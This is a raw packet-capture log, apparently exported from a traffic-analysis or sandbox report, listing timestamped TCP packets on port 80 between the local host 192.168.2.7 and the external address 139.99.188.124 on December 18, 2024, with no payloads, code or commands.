                                                                                        Dec 18, 2024 20:55:52.471278906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.471340895 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.472218990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.472245932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.472291946 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.473576069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.474286079 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.474350929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.475908995 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.607640982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.607650995 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.607706070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.608670950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.608737946 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.609519005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.609560966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.609638929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.610574007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.611505985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.611615896 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.613523960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.613533974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.613653898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.615400076 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.615415096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.615497112 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.617297888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.618283033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.618333101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.618508101 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.630266905 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.630382061 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.630414963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.630651951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.630731106 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.630829096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.632055044 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.632127047 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.632282972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.633022070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.633030891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.633080006 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.633843899 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.633970022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.634072065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.634715080 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.634727001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.634816885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.635484934 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.635545015 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.635807037 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.636018038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.636028051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.636136055 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.637300968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.637310982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.637371063 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.637957096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.638129950 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.638173103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.638896942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.638906002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.638995886 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.639578104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.639653921 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.639935970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.640614033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.640623093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.640686989 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.641371012 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.641381025 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.641480923 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.642076015 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.642195940 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.642600060 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.643040895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.643050909 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.643098116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.643923044 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.644095898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.644356966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.644845963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.644889116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.644937992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.645680904 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.645689964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.645761967 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.646822929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.646831989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.646891117 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.647564888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.647715092 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.647780895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.648354053 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.648428917 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.648902893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.649168968 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.649235010 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.649316072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.650063992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.650135040 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.650300980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.650978088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.651031017 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.651304960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.651829004 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.651838064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.651954889 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.652823925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.652832031 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.652887106 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.653861046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.653985023 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.654263973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.654582024 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.654736042 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.654757023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.655400991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.655472994 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.655646086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.656264067 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.656375885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.656685114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.657156944 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.657176971 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.657244921 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.658301115 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.658502102 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.658530951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.659648895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.659714937 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.659733057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.660516977 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.660666943 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.661286116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.661303997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.661423922 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.661649942 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.662120104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.662128925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.662266016 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.662914991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.663115025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.663153887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.663403034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.663566113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.663873911 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.664278030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.664351940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.664408922 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.665232897 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.665246010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.665487051 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.667012930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.667032003 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.667344093 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.668162107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.668178082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.668764114 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.670716047 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.670723915 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.670804977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.672655106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.672833920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.673716068 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.674623013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.674710035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.675498962 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.676676035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.677102089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.803720951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.803734064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.803751945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.803761005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.803847075 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.803847075 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.804734945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.804744959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.804924965 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.805632114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.805640936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.805650949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.805757999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.806210041 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.806226969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.806338072 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.806890011 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.806900978 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.807008982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.807591915 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.807715893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.822437048 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.822454929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.822552919 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.822765112 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.822899103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.822961092 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.823721886 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.823770046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.823846102 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.824595928 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.824964046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.825057030 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.825398922 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.825746059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.826153040 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.826446056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.826455116 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.826572895 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.827327013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.827337027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.827471972 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.828169107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.828186989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.828244925 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.828954935 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.829224110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.829296112 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.829822063 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.830493927 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.830640078 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.830924988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.830935001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.831033945 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.831820965 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.832101107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.832205057 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.832506895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.832531929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.832904100 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.833395958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.833774090 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.833911896 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.834245920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.834254980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.834419966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.835179090 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.835187912 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.835355043 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.836081982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.836513042 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.836623907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.836909056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.836919069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.837141991 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.837855101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.837930918 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.838193893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.838826895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.838835955 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.839154959 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.839586973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.839777946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.839862108 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.840744019 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.840754032 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.840842962 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.841557026 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.841567039 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.841655970 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.842673063 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.842683077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.842787981 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.843451977 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.843591928 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.843761921 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.844247103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.844257116 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.844343901 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.844882011 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.845316887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.845910072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.845917940 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.845963001 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.846267939 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.846735001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.846750975 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.847032070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.847543955 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.848303080 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.848418951 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.848434925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.848443985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.849082947 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.849365950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.849448919 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850214958 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850326061 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.850366116 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.850814104 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.851198912 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.851557016 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.851660967 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.852046013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.852979898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853060007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853075981 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.853362083 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.853930950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854181051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854505062 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.854701996 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.854872942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.855273008 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.855631113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856101990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856702089 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.856740952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856753111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.856946945 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.857569933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.857906103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.858035088 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.858536959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859395027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859404087 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859644890 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.859715939 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.859781027 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.860809088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.860819101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.860897064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.861726046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.861742020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.861862898 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.862238884 CET8049795139.99.188.124192.168.2.7
